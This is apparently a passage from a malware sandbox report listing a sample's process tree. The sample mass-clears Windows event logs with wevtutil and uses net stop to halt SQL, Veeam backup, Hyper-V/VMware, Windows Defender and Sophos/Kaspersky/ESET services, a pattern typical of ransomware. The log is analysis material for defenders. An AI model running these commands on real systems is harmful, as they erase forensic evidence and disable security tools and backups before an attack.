C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Known Folders API Service"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MCT/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NTLM/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetShell/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "SQLBrowser"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"3⤵
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"3⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"3⤵
-
C:\Windows\system32\net.exenet stop "SQLWriter"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"3⤵
-
C:\Windows\system32\net.exenet stop "SstpSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"3⤵
-
C:\Windows\system32\net.exenet stop "svcGenericHost"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"3⤵
-
C:\Windows\system32\net.exenet stop "tmlisten"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"3⤵
-
C:\Windows\system32\net.exenet stop "TrueKey"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"3⤵
-
C:\Windows\system32\net.exenet stop "UI0Detect"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamMountSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"3⤵
-
C:\Windows\system32\net.exenet stop "W3Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"3⤵
-
C:\Windows\system32\net.exenet stop "WRSVC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"3⤵
-
C:\Windows\system32\net.exenet stop "swi_update"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"3⤵
-
C:\Windows\system32\net.exenet stop "SQL Backups"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"3⤵
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "msftesql$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "msftesql$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"3⤵
-
C:\Windows\system32\net.exenet stop "NetMsmqActivator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EhttpSrv"3⤵
-
C:\Windows\system32\net.exenet stop "EhttpSrv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EhttpSrv"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ekrn"3⤵
-
C:\Windows\system32\net.exenet stop "ekrn"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ekrn"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ESHASRV"3⤵
-
C:\Windows\system32\net.exenet stop "ESHASRV"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ESHASRV"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SOPHOS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SOPHOS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SOPHOS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SOPHOS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AVP"3⤵
-
C:\Windows\system32\net.exenet stop "AVP"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AVP"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "klnagent"3⤵
-
C:\Windows\system32\net.exenet stop "klnagent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "klnagent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQLEXPRESS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQLEXPRESS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "HvHost"3⤵
-
C:\Windows\system32\net.exenet stop "HvHost"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "HvHost"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"3⤵
-
C:\Windows\system32\net.exenet stop "vmickvpexchange"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmickvpexchange"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"3⤵
-
C:\Windows\system32\net.exenet stop "vmicguestinterface"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicguestinterface"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicshutdown"3⤵
-
C:\Windows\system32\net.exenet stop "vmicshutdown"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicshutdown"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"3⤵
-
C:\Windows\system32\net.exenet stop "vmicheartbeat"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicheartbeat"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmcompute"3⤵
-
C:\Windows\system32\net.exenet stop "vmcompute"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmcompute"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvmsession"3⤵
-
C:\Windows\system32\net.exenet stop "vmicvmsession"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvmsession"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicrdv"3⤵
-
C:\Windows\system32\net.exenet stop "vmicrdv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicrdv"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmictimesync"3⤵
-
C:\Windows\system32\net.exenet stop "vmictimesync"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmictimesync"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvss"3⤵
-
C:\Windows\system32\net.exenet stop "vmicvss"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMAuthdService"3⤵
-
C:\Windows\system32\net.exenet stop "VMAuthdService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMAuthdService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"3⤵
-
C:\Windows\system32\net.exenet stop "VMnetDHCP"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMnetDHCP"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"3⤵
-
C:\Windows\system32\net.exenet stop "VMUSBArbService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMUSBArbService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMwareHostd"3⤵
-
C:\Windows\system32\net.exenet stop "VMwareHostd"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMwareHostd"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sense"3⤵
-
C:\Windows\system32\net.exenet stop "Sense"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sense"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WdNisSvc"3⤵
-
C:\Windows\system32\net.exenet stop "WdNisSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WdNisSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WinDefend"3⤵
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"1⤵
-
